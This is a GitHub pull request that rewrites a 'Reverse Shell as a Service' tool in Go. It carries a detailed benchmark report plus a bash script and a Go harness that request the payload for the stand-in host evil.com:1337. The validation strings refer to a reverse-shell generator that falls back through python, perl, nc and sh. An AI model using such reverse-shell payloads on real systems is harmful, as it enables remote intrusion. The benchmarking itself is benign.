Skip to content

Comments

Rewrite in Go#38

Merged
lukechilds merged 4 commits intomasterfrom
go
Feb 11, 2026
Merged

Rewrite in Go#38
lukechilds merged 4 commits intomasterfrom
go

Conversation

@lukechilds
Copy link
Owner

@lukechilds lukechilds commented Feb 11, 2026

Performance Benchmark: Go rewrite vs Node.js

Benchmarks comparing the Go rewrite (a920db4) against the previous Node.js implementation (f6d0868) of reverse-shell.

Both versions are checked out from git, built from source, and validated for correctness before benchmarking. Responses are verified to be identical between implementations.

Test Environment

Machine Apple M4 Max, 16 cores, 64 GB RAM
OS Darwin arm64 (macOS)
Go 1.26.0 darwin/arm64
Node.js v22.14.0
Tools ApacheBench 2.3, custom Go harness

Results

1. Cold Start — exec to first HTTP response

Measures the full lifecycle: process exec, runtime init, listen, accept, process request, write response, client reads full response. 100 runs, zero failures.

Go Node.js
min 2.91 ms 21.86 ms 7.5x
p50 3.28 ms 53.58 ms 16.3x
mean 4.34 ms 55.48 ms 12.8x
p95 4.33 ms 107.85 ms 24.9x
p99 98.20 ms 128.87 ms 1.3x
stddev 9.45 ms 19.65 ms

Go serves its first response in ~3 ms. Node.js needs ~54 ms to boot the V8 engine, JIT-compile the JS, and respond.

Methodology

A compiled Go harness execs the server process and immediately enters a tight net.Dial loop (each failed attempt takes ~microseconds on localhost — immediate ECONNREFUSED). The instant the TCP connection succeeds (the kernel listen() backlog is active), a raw HTTP/1.0 GET request is written onto the connection. Those bytes land in the kernel TCP receive buffer before the server has even called accept(). The harness then blocks on read() until the full response arrives and validates it contains all expected payload strings. Clock runs from exec to final response byte.

2. Hot Response — serial latency (c=1)

Single-connection latency after warmup. 10,000 requests.

Go Node.js
Requests/sec 14,356 15,176
Mean latency 0.070 ms 0.066 ms
p99 < 1 ms < 1 ms
Failed 0 0

Both sub-millisecond. Node.js is marginally faster — V8's JIT-compiled string templates outperform Go's fmt.Sprintf for this trivial workload once hot.

3. Hot Response — throughput (c=50)

50 concurrent connections, 50,000 requests after warmup.

Go Node.js
Requests/sec 37,207 37,773
Mean latency 1.34 ms 1.32 ms
p95 2 ms 1 ms
p99 2 ms 2 ms
Failed 0 0

Effectively identical. Both push ~37k req/s. The workload is pure string templating — neither runtime is the bottleneck.

4. Memory Usage (RSS)

Go Node.js
Idle (after warmup) 17.6 MB 93.8 MB 5.3x less
After 110k requests 18.3 MB 108.7 MB 5.9x less
Growth +0.7 MB +14.9 MB

Go's memory is 5–6x smaller and stays nearly flat under load. Node.js carries V8 heap, JIT compiler, and GC overhead regardless of workload complexity.

5. CPU Time

Cumulative server process CPU time across all hot benchmarks (~110k total requests):

Go Node.js
CPU time 3.38 s 1.71 s

Node.js used ~2x less CPU for the same work — V8's event loop is efficient for this I/O-bound, string-heavy workload. Go's goroutine-per-connection model has more scheduling overhead for trivial handlers.

6. Deployable Size

Everything needed to run each version:

Go Node.js
Runtime binary 104 MB (node)
Application 7.6 MB 4 KB (api/index.js)
Total 7.6 MB ~104 MB

Go compiles to a single self-contained binary — 13.7x smaller than the Node.js runtime alone. Copy it anywhere and it runs.


Summary

Metric Winner Margin
Cold start Go ~16x faster (3 ms vs 54 ms)
Hot latency (c=1) Node.js ~1.1x
Hot throughput (c=50) Tie ~37k req/s each
Memory Go ~5.5x less (18 MB vs 109 MB)
CPU efficiency Node.js ~2x less CPU time
Deployable size Go 13.7x smaller (7.6 MB vs ~104 MB)

Where Go wins

  • Cold start: 3 ms vs 54 ms. For a service behind an edge cache (s-maxage=2592000) that spins up instances on-demand, this is the metric that matters most.
  • Memory: 18 MB vs 109 MB. Relevant for containers, edge nodes, and constrained environments.
  • Deployable size: 7.6 MB static binary vs ~104 MB for the Node.js runtime alone.

Where it doesn't matter

Hot path performance is identical for this workload. The handler is trivial string templating — neither runtime is the bottleneck. In production, responses are served from the edge cache anyway.


Reproducing

The benchmark checks out both versions from git, builds them, validates responses are correct and identical, then runs all tests. Two files — drop them anywhere in the repo:

bench/run.sh — orchestration
#!/usr/bin/env bash
set -euo pipefail

# ─────────────────────────────────────────────────────────────
# Benchmark: Go rewrite vs Node.js — reverse-shell
#
# Checks out both versions from git, builds them, validates
# responses, and benchmarks cold start, hot response, memory,
# and CPU usage.
#
# Prerequisites: go, node, ab (ApacheBench), git
# Usage: ./run.sh            (run from inside the git repo)
# ─────────────────────────────────────────────────────────────

REPO="$(git rev-parse --show-toplevel)"
GO_COMMIT="$(git rev-parse HEAD)"
NODE_COMMIT="$(git rev-parse '7a23dfb^')"

GO_PORT=4444
NODE_PORT=4445

RUNS=100
AB_REQUESTS=50000
AB_CONCURRENCY=50

WORK=$(mktemp -d)
trap 'cleanup' EXIT

GO_DIR="$WORK/go-src"
NODE_DIR="$WORK/node-src"

GO_PID=""
NODE_PID=""

cleanup() {
    [ -n "$GO_PID" ] && kill "$GO_PID" 2>/dev/null && wait "$GO_PID" 2>/dev/null || true
    [ -n "$NODE_PID" ] && kill "$NODE_PID" 2>/dev/null && wait "$NODE_PID" 2>/dev/null || true
    rm -rf "$WORK"
}

wait_for_port() {
    local port=$1
    while ! curl -s "http://127.0.0.1:$port/" > /dev/null 2>&1; do sleep 0.01; done
}

header() { printf "\n\033[1;36m==> %s\033[0m\n" "$1"; }

# ─── PREREQUISITES ─────────────────────────────────
header "Checking prerequisites"
for cmd in go node ab git curl; do
    command -v "$cmd" > /dev/null || { echo "missing: $cmd"; exit 1; }
done
echo "go:   $(go version)"
echo "node: $(node --version)"
echo "ab:   $(ab -V 2>&1 | head -1)"
echo "os:   $(uname -ms)"

# ─── CHECKOUT SOURCES ──────────────────────────────
header "Exporting Go source (${GO_COMMIT:0:7})"
mkdir -p "$GO_DIR"
git -C "$REPO" archive "$GO_COMMIT" | tar -x -C "$GO_DIR"

header "Exporting Node.js source (${NODE_COMMIT:0:7})"
mkdir -p "$NODE_DIR"
git -C "$REPO" archive "$NODE_COMMIT" | tar -x -C "$NODE_DIR"

# ─── BUILD GO BINARY ──────────────────────────────
header "Building Go binary"
(cd "$GO_DIR" && go build -o "$WORK/server-go" .)
ls -lh "$WORK/server-go"

# ─── WRITE NODE.JS SERVER WRAPPER ──────────────────
# Thin shim that calls the actual exported handler from api/index.js.
# Adapts request.query and response.send() to match the Vercel interface
# the original handler expects (see vercel.json rewrites: /:address → /api).
header "Writing Node.js server wrapper"
cat > "$NODE_DIR/server.js" << 'WRAPPER'
const handler = require('./api/index');
const http = require('http');
const port = process.env.PORT || 3001;
const server = http.createServer((req, res) => {
    const address = req.url.replace(/^\//, '');
    req.query = { address };
    res.send = (body) => res.end(body);
    handler(req, res);
});
server.listen(port, () => console.log(`Listening on :${port}`));
WRAPPER

# ─── BUILD BENCHMARK HARNESS ──────────────────────
header "Building benchmark harness"
SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
HARNESS_BUILD=$(mktemp -d)
cp "$SCRIPT_DIR/harness.go" "$HARNESS_BUILD/main.go"
(cd "$HARNESS_BUILD" && go mod init bench-harness > /dev/null 2>&1 && go build -o harness .)
cp "$HARNESS_BUILD/harness" "$WORK/bench-harness"
rm -rf "$HARNESS_BUILD"

# ─── VALIDATE RESPONSES ───────────────────────────
header "Validating response correctness"

PORT=$GO_PORT "$WORK/server-go" &
GO_PID=$!
PORT=$NODE_PORT node "$NODE_DIR/server.js" &
NODE_PID=$!
wait_for_port $GO_PORT
wait_for_port $NODE_PORT

go_body=$(curl -s "http://127.0.0.1:$GO_PORT/evil.com:1337")
node_body=$(curl -s "http://127.0.0.1:$NODE_PORT/evil.com:1337")

for label_body in "Go:$go_body" "Node:$node_body"; do
    label="${label_body%%:*}"
    body="${label_body#*:}"
    for needle in 'Reverse Shell as a Service' '("evil.com",1337)' 'command -v python' 'command -v perl' 'command -v nc' 'command -v sh'; do
        if ! echo "$body" | grep -q "$needle"; then
            echo "FAIL: $label response missing: $needle"
            exit 1
        fi
    done
    echo "$label: response valid"
done

if [ "$go_body" = "$node_body" ]; then
    echo "Responses match: identical output"
else
    echo "WARNING: responses differ:"
    diff <(echo "$go_body") <(echo "$node_body") || true
fi

kill "$GO_PID" 2>/dev/null; wait "$GO_PID" 2>/dev/null || true; GO_PID=""
kill "$NODE_PID" 2>/dev/null; wait "$NODE_PID" 2>/dev/null || true; NODE_PID=""
sleep 0.5

# ─── COLD START BENCHMARK ─────────────────────────
header "Cold start benchmark ($RUNS runs each)"

echo ""
echo "--- Go ---"
"$WORK/bench-harness" $GO_PORT $RUNS "$WORK/server-go"

echo ""
echo "--- Node.js ---"
"$WORK/bench-harness" $NODE_PORT $RUNS node "$NODE_DIR/server.js"

# ─── HOT RESPONSE BENCHMARKS ──────────────────────
header "Starting servers for hot benchmarks"

PORT=$GO_PORT "$WORK/server-go" &
GO_PID=$!
PORT=$NODE_PORT node "$NODE_DIR/server.js" &
NODE_PID=$!
wait_for_port $GO_PORT
wait_for_port $NODE_PORT

# Warmup
ab -n 5000 -c 20 "http://127.0.0.1:$GO_PORT/evil.com:1337" > /dev/null 2>&1
ab -n 5000 -c 20 "http://127.0.0.1:$NODE_PORT/evil.com:1337" > /dev/null 2>&1

# ─── Memory: idle ──────────────────────────────────
sleep 2
header "Memory usage (idle)"
echo "Go:      $(( $(ps -o rss= -p $GO_PID | xargs) )) KB"
echo "Node.js: $(( $(ps -o rss= -p $NODE_PID | xargs) )) KB"

# ─── Serial latency (c=1) ─────────────────────────
header "Hot response — serial (c=1, 10000 requests)"
echo ""
echo "--- Go ---"
ab -n 10000 -c 1 "http://127.0.0.1:$GO_PORT/evil.com:1337" 2>&1 | \
    grep -E "(Complete requests|Failed requests|Requests per second|Time per request|50%|66%|75%|90%|95%|99%|100%)"
echo ""
echo "--- Node.js ---"
ab -n 10000 -c 1 "http://127.0.0.1:$NODE_PORT/evil.com:1337" 2>&1 | \
    grep -E "(Complete requests|Failed requests|Requests per second|Time per request|50%|66%|75%|90%|95%|99%|100%)"

# ─── Throughput (c=50) ────────────────────────────
header "Hot response — throughput (c=$AB_CONCURRENCY, $AB_REQUESTS requests)"
echo ""
echo "--- Go ---"
ab -n $AB_REQUESTS -c $AB_CONCURRENCY "http://127.0.0.1:$GO_PORT/evil.com:1337" 2>&1 | \
    grep -E "(Complete requests|Failed requests|Requests per second|Time per request|50%|66%|75%|90%|95%|99%|100%)"
echo ""
echo "--- Node.js ---"
ab -n $AB_REQUESTS -c $AB_CONCURRENCY "http://127.0.0.1:$NODE_PORT/evil.com:1337" 2>&1 | \
    grep -E "(Complete requests|Failed requests|Requests per second|Time per request|50%|66%|75%|90%|95%|99%|100%)"

# ─── Memory: after load ───────────────────────────
sleep 1
header "Memory usage (after load)"
echo "Go:      $(( $(ps -o rss= -p $GO_PID | xargs) )) KB"
echo "Node.js: $(( $(ps -o rss= -p $NODE_PID | xargs) )) KB"

# ─── CPU time ─────────────────────────────────────
header "Server CPU time (cumulative)"
echo "Go:      $(ps -o time= -p $GO_PID | xargs)"
echo "Node.js: $(ps -o time= -p $NODE_PID | xargs)"

# ─── Deployable size ──────────────────────────────
header "Deployable size"
(cd "$NODE_DIR" && npm install --production --silent 2>/dev/null)
node_modules_size=$(du -sh "$NODE_DIR/node_modules" 2>/dev/null | cut -f1 | xargs)
[ -z "$node_modules_size" ] && node_modules_size="0"
echo "Go:      $(du -h "$WORK/server-go" | cut -f1 | xargs) (static binary — total)"
echo "Node.js: $(du -h "$(which node)" | cut -f1 | xargs) (node binary) + $(du -sh "$NODE_DIR/api" | cut -f1 | xargs) (source) + ${node_modules_size} (node_modules)"

header "Done"
bench/harness.go — cold start measurement
package main

import (
	"bufio"
	"bytes"
	"fmt"
	"io"
	"math"
	"net"
	"os"
	"os/exec"
	"sort"
	"strconv"
	"strings"
	"time"
)

// Every response is validated against these strings.
var expect = []string{
	"Reverse Shell as a Service",
	`("evil.com",1337)`,
	"if command -v python",
	"if command -v perl",
	"if command -v nc",
	"if command -v sh",
}

func main() {
	if len(os.Args) < 4 {
		fmt.Fprintf(os.Stderr, "usage: harness <port> <runs> <cmd> [args...]\n")
		os.Exit(1)
	}

	port := os.Args[1]
	runs, _ := strconv.Atoi(os.Args[2])
	argv := os.Args[3:]
	addr := "127.0.0.1:" + port
	httpReq := "GET /evil.com:1337 HTTP/1.0\r\nHost: " + addr + "\r\n\r\n"

	results := make([]time.Duration, 0, runs)
	var failures int

	for i := 0; i < runs; i++ {
		cmd := exec.Command(argv[0], argv[1:]...)
		cmd.Env = append(os.Environ(), "PORT="+port)
		cmd.Stdout = io.Discard
		cmd.Stderr = io.Discard

		start := time.Now()
		if err := cmd.Start(); err != nil {
			fmt.Fprintf(os.Stderr, "run %d: start failed: %v\n", i, err)
			failures++
			continue
		}

		// Tight connect loop — spins until the server's listen() syscall
		// has completed and the kernel backlog is active. Each failed
		// dial is ~microseconds on localhost (immediate ECONNREFUSED).
		var conn net.Conn
		for {
			c, err := net.Dial("tcp", addr)
			if err == nil {
				conn = c
				break
			}
		}

		// Write the HTTP request immediately. The bytes land in the
		// kernel's TCP receive buffer before the server calls accept().
		fmt.Fprint(conn, httpReq)

		// Block until the server accepts, reads our buffered request,
		// processes it, writes the response, and closes (HTTP/1.0 → EOF).
		var body bytes.Buffer
		reader := bufio.NewReader(conn)
		for {
			line, err := reader.ReadBytes('\n')
			body.Write(line)
			if err != nil {
				break
			}
		}
		elapsed := time.Since(start)
		conn.Close()

		// Validate response contains all expected payload strings.
		resp := body.String()
		valid := true
		for _, s := range expect {
			if !strings.Contains(resp, s) {
				fmt.Fprintf(os.Stderr, "run %d: VALIDATION FAILED — missing %q\n", i, s)
				valid = false
				break
			}
		}

		if valid {
			results = append(results, elapsed)
		} else {
			failures++
		}

		cmd.Process.Kill()
		cmd.Wait()
	}

	if len(results) == 0 {
		fmt.Fprintln(os.Stderr, "ALL RUNS FAILED")
		os.Exit(1)
	}

	sort.Slice(results, func(i, j int) bool { return results[i] < results[j] })

	n := float64(len(results))
	var sum float64
	for _, v := range results {
		sum += float64(v.Microseconds())
	}
	mean := sum / n
	var sqDiff float64
	for _, v := range results {
		diff := float64(v.Microseconds()) - mean
		sqDiff += diff * diff
	}
	stddev := math.Sqrt(sqDiff / n)

	p := func(pct int) time.Duration { return results[len(results)*pct/100] }

	fmt.Printf("runs=%d failures=%d\n", runs, failures)
	fmt.Printf("min=%s\n", results[0].Truncate(time.Microsecond))
	fmt.Printf("p50=%s\n", p(50).Truncate(time.Microsecond))
	fmt.Printf("mean=%s\n", time.Duration(mean*1000).Truncate(time.Microsecond))
	fmt.Printf("p95=%s\n", p(95).Truncate(time.Microsecond))
	fmt.Printf("p99=%s\n", p(99).Truncate(time.Microsecond))
	fmt.Printf("max=%s\n", results[len(results)-1].Truncate(time.Microsecond))
	fmt.Printf("stddev=%s\n", time.Duration(stddev*1000).Truncate(time.Microsecond))
}

@vercel
Copy link

vercel bot commented Feb 11, 2026

The latest updates on your projects. Learn more about Vercel for GitHub.

Project Deployment Actions Updated (UTC)
reverse-shell Ready Ready Preview, Comment Feb 11, 2026 4:18pm

@lukechilds lukechilds changed the title Convert to Go Go Feb 11, 2026
@lukechilds lukechilds merged commit 7a23dfb into master Feb 11, 2026
4 checks passed
@lukechilds lukechilds changed the title Go Rewrite in Go Feb 17, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant